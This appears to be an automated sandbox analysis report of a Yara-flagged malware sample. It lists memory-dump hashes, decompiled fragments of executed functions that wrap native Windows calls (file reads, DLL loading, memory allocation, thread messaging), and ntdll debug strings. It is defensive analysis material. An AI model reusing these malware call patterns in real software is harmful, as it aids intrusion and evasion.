                                          • Instruction Fuzzy Hash: B711E675108B85CFC3219F29D858362BBB0FF51304F044A6DC5568BAE1D7789A898791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04576c952dbda86e6868808ecc685135d5397f4cd775e7020e110665a505a8b7
                                          • Instruction ID: 2121f7ac7f2617186c558d85eae4af6355f7b2b137a3624ee2ebdb7b103b2d46
                                          • Opcode Fuzzy Hash: 04576c952dbda86e6868808ecc685135d5397f4cd775e7020e110665a505a8b7
                                          • Instruction Fuzzy Hash: 2911D474E15209DFDB90DFA8D998AADBBB1FF48314F208429E812EB324D7309A45CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3abb0f6fad3bc78e79bad60918baa8db67f8e572dc832da875127232640c9fd8
                                          • Instruction ID: fd8f3d2e912b3e30dbe392bda5af647ae91ac19c6a16c26418e818b1e2f62aa8
                                          • Opcode Fuzzy Hash: 3abb0f6fad3bc78e79bad60918baa8db67f8e572dc832da875127232640c9fd8
                                          • Instruction Fuzzy Hash: 5001FD3420C34DDF83C81A26A80883237A6EAC071D3B041A7FE53CB641EA216E0187B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83fb2574ef2b37238e60f639de275f6b78ce4dd55d8097babb3391a18dd09dcc
                                          • Instruction ID: c3e807b134d59824da201b3c8d811fb2d528a17c4053b44a7adc7aeb41443f9d
                                          • Opcode Fuzzy Hash: 83fb2574ef2b37238e60f639de275f6b78ce4dd55d8097babb3391a18dd09dcc
                                          • Instruction Fuzzy Hash: 6C018B39B00144CFE7908B69E458B6933F1EB4632CF1500A9DA06CB261E736DEC5CB02
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ba9b9a4b41e39e0517547f902ca3e56edf13a513dd361a375da4eaae4cb2177
                                          • Instruction ID: 58c5cf5969f0521c0550c0a2b3992220b6aef0b7536e62b6b497aed7a6a8a893
                                          • Opcode Fuzzy Hash: 6ba9b9a4b41e39e0517547f902ca3e56edf13a513dd361a375da4eaae4cb2177
                                          • Instruction Fuzzy Hash: E1F09A3520D29CDFC3829A699414871B7A4FE023EC31000AAEE03CB661EAA14E41CBA3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7aec998ac16fbb40ea3c7a8ed4591b9035ed42d6337acf92059891b12ddf826a
                                          • Instruction ID: 0de313e76f1f1b7be6c49c61b7226df819f817f744934fb864f5cb08d00ca6df
                                          • Opcode Fuzzy Hash: 7aec998ac16fbb40ea3c7a8ed4591b9035ed42d6337acf92059891b12ddf826a
                                          • Instruction Fuzzy Hash: 08018170A0425ADBEB24CB6AC80476ABFB6EB45710F00C1ADD605E7740DF745A44DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b96fc85635a8b3e32ca137f0dda172acbb24b1d0b8a69c7db50eea40cdde8774
                                          • Instruction ID: 3ea6b1a8ad6c9d509845e6cee585e2586fa57cc31b5dd1728cfff0232fa4da16
                                          • Opcode Fuzzy Hash: b96fc85635a8b3e32ca137f0dda172acbb24b1d0b8a69c7db50eea40cdde8774
                                          • Instruction Fuzzy Hash: 84F0AF70E04259DBEB24CB6AC8047AABFB5EB44320F00C0AEDA05E7740DF740A44DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1e6c3fb75f1a2dfc5470277371f4fd035321cc3e67fe6f8398b4b651f5007d5
                                          • Instruction ID: 7dd14991b3c6b398497490b41bbdda974bf6c9dd74bfc2a6a3a9b63be505b20a
                                          • Opcode Fuzzy Hash: b1e6c3fb75f1a2dfc5470277371f4fd035321cc3e67fe6f8398b4b651f5007d5
                                          • Instruction Fuzzy Hash: D6F089312186414BC324EB39A8584BBB7E7EBD83143458F6DD25A87694DF71980687D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba223de75d1ed42e2e4f03994d8ff01843908a39f730903bb64f92931226d379
                                          • Instruction ID: c3856f0a2db361b1658b5ad286da7301104a17384d3f9b43a2ae182a7cc02e1d
                                          • Opcode Fuzzy Hash: ba223de75d1ed42e2e4f03994d8ff01843908a39f730903bb64f92931226d379
                                          • Instruction Fuzzy Hash: 12F0E23520D759EF83959B69A4084267BF5FE953543214186F90ACB225D621AD008BB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1fc3b4cdffe8cda7760027e1a1ece31a2b8a80ffcce6dc6377b341886d19acfe
                                          • Instruction ID: 60b43f4745270559b0deb11880ee21869d7adff2949bbd208eaf13d6bd2251d5
                                          • Opcode Fuzzy Hash: 1fc3b4cdffe8cda7760027e1a1ece31a2b8a80ffcce6dc6377b341886d19acfe
                                          • Instruction Fuzzy Hash: 0AF0A7322046409BD214EB58D88965BF7D7FF88210B41CD3CC34A8F658DF71AC0887E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc3574ac008b30921ec140429682ca729e3e3d44bf635a48b4df0ded0f0eac21
                                          • Instruction ID: e60b5be104519928dd59f6332d16d3c6848910d4c894a3d829f1de2de05e9791
                                          • Opcode Fuzzy Hash: dc3574ac008b30921ec140429682ca729e3e3d44bf635a48b4df0ded0f0eac21
                                          • Instruction Fuzzy Hash: 57E0E53121470547C264EA79E84886BB7E7EBC9224345CE2DD35A87694DF71AD0947E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 801db1f8005ddd90d74758b53620a3b5a8718d922088bed736eda4a46819adcd
                                          • Instruction ID: 273a5399b369ce8590a874e91cdf459effce90291f2aba00aae8f4054a37e3ae
                                          • Opcode Fuzzy Hash: 801db1f8005ddd90d74758b53620a3b5a8718d922088bed736eda4a46819adcd
                                          • Instruction Fuzzy Hash: 08E0ED3140D6C58FD3621778D81912B7FB4EE6232A745509AF483DA026E6600D44C715
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

                                          Non-executed Functions

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

                                          Executed Functions

                                          C-Code - Quality: 37%
                                          			E00417C40(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                          				void* _t18;
                                          				void* _t27;
                                          				intOrPtr* _t28;
                                          
                                          				_t13 = _a4;
                                          				_t28 = _a4 + 0xc48;
                                          				E00418790(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                          				_t6 =  &_a32; // 0x413732
                                          				_t12 =  &_a8; // 0x413732
                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                          				return _t18;
                                          			}






                                          APIs
                                          • NtReadFile.NTDLL(27A,5EB6D251,FFFFFFFF,004133F1,?,?,27A,?,004133F1,FFFFFFFF,5EB6D251,00413732,?,00000000), ref: 00417C85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 27A$27A
                                          • API String ID: 2738559852-1193276748
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00417B4A(signed int __eax, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48, void* _a52) {
                                          				signed int _t21;
                                          
                                          				_t21 = __eax | 0xcbb9ef41;
                                          				if (_t21 == 0) goto L3;
                                          			}




                                          APIs
                                          • NtCreateFile.NTDLL(00000060,004088C3,?,w5A,004088C3,FFFFFFFF,?,?,FFFFFFFF,004088C3,00413577,?,004088C3,00000060,00000000,00000000), ref: 00417BDD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: w5A
                                          • API String ID: 823142352-219485303
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004098F0(void* __eflags, void* _a4, intOrPtr _a8) {
                                          				char* _v8;
                                          				struct _EXCEPTION_RECORD _v12;
                                          				struct _OBJDIR_INFORMATION _v16;
                                          				char _v536;
                                          				void* _t15;
                                          				struct _OBJDIR_INFORMATION _t17;
                                          				struct _OBJDIR_INFORMATION _t18;
                                          				void* _t30;
                                          				void* _t31;
                                          				void* _t32;
                                          
                                          				_v8 =  &_v536;
                                          				_t15 = E0041A4F0( &_v12, 0x104, _a8);
                                          				_t31 = _t30 + 0xc;
                                          				if(_t15 != 0) {
                                          					_t17 = E0041A910(__eflags, _v8);
                                          					_t32 = _t31 + 4;
                                          					__eflags = _t17;
                                          					if(_t17 != 0) {
                                          						E0041AB90( &_v12, 0);
                                          						_t32 = _t32 + 8;
                                          					}
                                          					_t18 = E00418CD0(_v8);
                                          					_v16 = _t18;
                                          					__eflags = _t18;
                                          					if(_t18 == 0) {
                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                          						return _v16;
                                          					}
                                          					return _t18;
                                          				} else {
                                          					return _t15;
                                          				}
                                          			}













                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409962
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00417D70(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                          				long _t14;
                                          				void* _t21;
                                          
                                          				_t3 = _a4 + 0xc60; // 0xca0
                                          				E00418790(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                          				return _t14;
                                          			}





                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418964,?,00000000,?,00003000,00000040,00000000,00000000,004088C3), ref: 00417DA9
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00417CC0(intOrPtr _a4, void* _a8) {
                                          				long _t8;
                                          				void* _t11;
                                          
                                          				_t5 = _a4;
                                          				_t2 = _t5 + 0x10; // 0x300
                                          				_t3 = _t5 + 0xc50; // 0x409513
                                          				E00418790(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                          				_t8 = NtClose(_a8); // executed
                                          				return _t8;
                                          			}






                                          APIs
                                          • NtClose.NTDLL(00413710,?,?,00413710,004088C3,FFFFFFFF), ref: 00417CE5
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00417CBF(intOrPtr _a4, void* _a8) {
                                          				long _t8;
                                          				void* _t12;
                                          
                                          				_t5 = _a4;
                                          				_t2 = _t5 + 0x10; // 0x300
                                          				_t3 = _t5 + 0xc50; // 0x409513
                                          				E00418790(_t12, _a4, _t3,  *_t2, 0, 0x2c);
                                          				_t8 = NtClose(_a8); // executed
                                          				return _t8;
                                          			}






                                          APIs
                                          • NtClose.NTDLL(00413710,?,?,00413710,004088C3,FFFFFFFF), ref: 00417CE5
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E00408690(intOrPtr _a4) {
                                          				void* _v8;
                                          				char _v24;
                                          				void* _v284;
                                          				void* _v804;
                                          				void* _v840;
                                          				void* _t24;
                                          				void* _t39;
                                          				intOrPtr _t52;
                                          				void* _t53;
                                          				void* _t54;
                                          
                                          				_t52 = _a4;
                                          				_t39 = 0; // executed
                                          				_t24 = E00406A40(_t52,  &_v24); // executed
                                          				_t54 = _t53 + 8;
                                          				if (_t24 != 0) goto L3;
                                          				_push(es);
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00417E60(intOrPtr _a4, void* _a8, long _a12, char _a16) {
                                          				void* _t10;
                                          				void* _t15;
                                          
                                          				E00418790(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                          				_t4 =  &_a16; // 0x41366f
                                          				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
                                          				return _t10;
                                          			}






                                          APIs
                                          • RtlAllocateHeap.NTDLL(00412EF6,?,o6A,0041366F,?,00412EF6,?,?,?,?,?,00000000,004088C3,?), ref: 00417E8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: o6A
                                          • API String ID: 1279760036-873313660
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E00417E93(void* __eax, signed char* __ecx, void* _a4, long _a8, void* _a12) {
                                          				intOrPtr _v0;
                                          				char _t13;
                                          				void* _t20;
                                          
                                          				asm("in eax, 0x8");
                                          				asm("loope 0x7f");
                                          				asm("arpl si, si");
                                          				 *__ecx =  ~( *__ecx);
                                          				_push(_t24);
                                          				_t10 = _v0;
                                          				_t4 = _t10 + 0xc74; // 0xc74
                                          				E00418790(_t20, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                          				_t13 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                          				return _t13;
                                          			}







                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,004088C3,?,?,004088C3,00000060,00000000,00000000,?,?,004088C3,?,00000000), ref: 00417ECD
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00406EA0(void* __eflags, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				void* _t12;
                                          				intOrPtr* _t13;
                                          				int _t14;
                                          				long _t21;
                                          				intOrPtr* _t25;
                                          				void* _t26;
                                          				void* _t30;
                                          
                                          				_t30 = __eflags;
                                          				_v68 = 0;
                                          				E004196C0( &_v67, 0, 0x3f);
                                          				E0041A2A0( &_v68, 3);
                                          				_t12 = E004098F0(_t30, _a4 + 0x1c,  &_v68); // executed
                                          				_t13 = E00413810(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                          				_t25 = _t13;
                                          				if(_t25 != 0) {
                                          					_t21 = _a8;
                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                          					_t32 = _t14;
                                          					if(_t14 == 0) {
                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409050(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                          					}
                                          					return _t14;
                                          				}
                                          				return _t13;
                                          			}













                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00406EFA
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 86aabadf8e07445ceb82468d69cbbbdf953cdd515357127d60cc95a49993ee3a
                                          • Instruction ID: 0a220d94033460800f8d40ca761919bb4cbf9dd730bb76aeff12ae2732b8fbad
                                          • Opcode Fuzzy Hash: 86aabadf8e07445ceb82468d69cbbbdf953cdd515357127d60cc95a49993ee3a
                                          • Instruction Fuzzy Hash: C101FC31A4021977E720BA959C03FFF776C5F41B54F054019FF04BA1C2D6A86D0546F9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CCC2,0040CCC2,00000041,00000000,?,00408935), ref: 00418030
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 8e4eadb4a1c00411362cba737a4c62b41c255c677aa3bc49835cf14671195ca5
                                          • Instruction ID: e5e2e031b0e742ffc5d861d767c7a9dc227be75d8bd3b72e60b28aa49311c108
                                          • Opcode Fuzzy Hash: 8e4eadb4a1c00411362cba737a4c62b41c255c677aa3bc49835cf14671195ca5
                                          • Instruction Fuzzy Hash: 5B016DB5200208ABDB24DF89CC41EEB37ADEF88354F158159FE1C97241C934E8508BB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E00417ED2(void* __eax, void* __edx, void* __eflags, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
                                          				char _t15;
                                          				signed char* _t17;
                                          				void* _t25;
                                          
                                          				_pop(_t17);
                                          				asm("o16 loopne 0x4b");
                                          				if(__eflags <= 0) {
                                          					 *_t17 =  ~( *_t17);
                                          					_push(_t29);
                                          					_t12 = _a8;
                                          					_t5 = _t12 + 0xc74; // 0xc74
                                          					E00418790(_t25, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
                                          					_t15 = RtlFreeHeap(_a12, _a16, _a20); // executed
                                          					return _t15;
                                          				} else {
                                          					return __eax;
                                          				}
                                          			}







                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,004088C3,?,?,004088C3,00000060,00000000,00000000,?,?,004088C3,?,00000000), ref: 00417ECD
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 2120b6026cb09f4da02fcb840bb4584844ea7904d27e095ef9f74338df278916
                                          • Instruction ID: 2b25174e765f06398b6e9f7f3d853c9a5a1d73eaf6ef0d5b8cd2a1caefd60e9e
                                          • Opcode Fuzzy Hash: 2120b6026cb09f4da02fcb840bb4584844ea7904d27e095ef9f74338df278916
                                          • Instruction Fuzzy Hash: 10F0A077204204AFD719DF95CC04FE737A9AF84320F24408AF9095B292C535E81087A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00418000(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                          				intOrPtr _t7;
                                          				int _t10;
                                          				void* _t15;
                                          
                                          				_t7 = _a4;
                                          				E00418790(_t15, _t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}







                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CCC2,0040CCC2,00000041,00000000,?,00408935), ref: 00418030
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: 0a706448c6c07ba1e6b2255bf273e2ca868e64ebec3b4ea137d33bbafb59c7b6
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction Fuzzy Hash: 57E01AB56002086BDB10DF49CC85EE737ADAF88660F118559BA0857241C934E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00417EA0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                          				char _t10;
                                          				void* _t15;
                                          
                                          				_t3 = _a4 + 0xc74; // 0xc74
                                          				E00418790(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}






                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,004088C3,?,?,004088C3,00000060,00000000,00000000,?,?,004088C3,?,00000000), ref: 00417ECD
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: 1e11c670efb4203027c0b4071ff50d9bfdf372f3f1b500429a6c2190be3e7db9
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: 4DE04FB52102046BD714DF59CC45EE777ADEF88760F114559FE1857241C630F910CAF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00417EE0(intOrPtr _a4, int _a8) {
                                          				void* _t10;
                                          
                                          				_t5 = _a4;
                                          				E00418790(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                          				ExitProcess(_a8);
                                          			}





                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00417F08
                                          Memory Dump Source
                                          • Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: a7a5b7fd0c486ba3a00f780e23918bda67c8832acaa876c7f9c7831b0dba985a
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: 37D012756102147BD620DB99CC85FD7779CDF48760F118469BA1C5B241C531BA0086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f4375ae15a58cf199eb05a54b2470ad63f0f08ce6700efa05e293671ca00ab6e
                                          • Instruction ID: f6dd106d9238fa98fe8dce7d7923894bf02c4bc3149433ebfbf360d8ffd08ebf
                                          • Opcode Fuzzy Hash: f4375ae15a58cf199eb05a54b2470ad63f0f08ce6700efa05e293671ca00ab6e
                                          • Instruction Fuzzy Hash: C2B09B71D464C5C6D711D7605A087177A04B7D0745F17D465D1021641B477CC4D5F5B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Strings
                                          • *** enter .exr %p for the exception record, xrefs: 00EBB4F1
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00EBB484
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00EBB53F
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00EBB476
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00EBB314
                                          • *** then kb to get the faulting stack, xrefs: 00EBB51C
                                          • The resource is owned shared by %d threads, xrefs: 00EBB37E
                                          • This failed because of error %Ix., xrefs: 00EBB446
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00EBB38F
                                          • The instruction at %p tried to %s , xrefs: 00EBB4B6
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00EBB323
                                          • The resource is owned exclusively by thread %p, xrefs: 00EBB374
                                          • write to, xrefs: 00EBB4A6
                                          • a NULL pointer, xrefs: 00EBB4E0
                                          • The instruction at %p referenced memory at %p., xrefs: 00EBB432
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 00EBB48F
                                          • <unknown>, xrefs: 00EBB27E, 00EBB2D1, 00EBB350, 00EBB399, 00EBB417, 00EBB48E
                                          • Go determine why that thread has not released the critical section., xrefs: 00EBB3C5
                                          • read from, xrefs: 00EBB4AD, 00EBB4B2
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00EBB305
                                          • *** enter .cxr %p for the context, xrefs: 00EBB50D
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00EBB47D
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00EBB39B
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00EBB2F3
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 00EBB352
                                          • The critical section is owned by thread %p., xrefs: 00EBB3B9
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00EBB3D6
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00EBB2DC
                                          • *** Inpage error in %ws:%s, xrefs: 00EBB418
                                          • an invalid address, %p, xrefs: 00EBB4CF
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
